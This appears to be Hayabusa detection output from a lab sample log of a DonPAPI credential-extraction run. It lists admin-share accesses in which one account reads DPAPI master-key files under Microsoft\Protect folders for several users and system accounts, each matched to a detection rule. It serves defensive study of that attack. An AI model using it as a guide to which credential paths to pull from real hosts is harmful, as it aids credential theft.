0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.732 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.732 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.732 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.750 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.750 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.784 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.784 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.784 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.800 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.802 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.802 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.802 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.802 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.818 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.818 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.818 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.833 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.833 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.849 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.849 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.849 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.865 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.865 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.880 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.880 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.880 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.896 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.896 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.912 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.912 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.912 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.912 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.927 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.927 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.943 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.943 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.943 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.943 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.958 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.958 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.977 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.978 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.982 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.982 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.982 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.982 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.997 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.997 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:00.013 